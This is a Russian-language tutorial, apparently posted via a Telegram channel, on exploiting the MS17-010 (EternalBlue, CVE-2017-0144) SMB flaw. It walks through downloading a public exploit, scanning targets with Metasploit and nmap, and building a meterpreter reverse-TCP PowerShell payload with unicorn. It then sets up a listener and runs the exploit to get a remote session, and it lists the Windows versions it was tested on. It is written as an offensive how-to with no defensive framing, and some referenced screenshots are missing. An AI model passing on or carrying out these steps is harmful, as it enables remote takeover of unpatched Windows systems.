CVE-2017-0144 |MS17-010

CVE-2017-0144 |MS17-010

https://t.me/Torchik_Ru

Всем привет, сегодня я вам покажу как эксплуатировать CVE-2017-0144 начнем.

Качаем это:

https://www.exploit-db.com/exploits/42315/

и это :

https://github.com/worawit/MS17-010/blob/master/mysmb.py

и вот это:

https://github.com/trustedsec/unicorn

Кидаем все в одну папку и создаем файл:Код:

touch _init_.py

Следующим шагом заходим в metasploit.

Пишем:

use auxiliary/scanner/smb/pipe_auditor
set rhosts <ваша цель>
run

Должно появиться это:

Теперь пишем:

nmap -A -p 445 <ваша цель>

Нас интересует это:

Далее пишем:

gedit <название файла скачанного отсюда https://www.exploit-db.com/exploits/42315/>

Там, где USERNAME, пишем что получили в nmap(guest)
Ищем этот фрагмент кода

Убираем комментарий с этой строчки:

Приводим строчку в такой вид:

Теперь создадим нагрузку:

python unicorn.py windows/meterpreter/reverse_tcp <ваш ip> <порт>

Открываем файл powershell_attack.txt копируем содержимое и вставляем сюда:

Удалим кавычку в конце:

Сохраняем файл.

Выставляем прослушку в metasploit :

use exploit multi/handler
set lport <port>
set lhost <ваш ip>
set payload windows/meterpreter/reverse_tcp
exploit

Эксплуатируем:

python <название файла скачанного отсюда https://www.exploit-db.com/exploits/42315/> <ip цели> <pipe>(например netlogon)

Выполняем команду до тех пор пока не появиться это:

Нам прилетает сессия)

Протестировано на:

- Windows 2016 x64
- Windows 10 Pro Build 10240 x64
- Windows 2012 R2 x64
- Windows 8.1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64
- Windows 2008 SP1 x64
- Windows 2003 R2 SP2 x64
- Windows XP SP2 x64
- Windows 8.1 x86
- Windows 7 SP1 x86
- Windows 2008 SP1 x86
- Windows 2003 SP2 x86
- Windows XP SP3 x86
- Windows 2000 SP4 x86

[Источник]


Report Page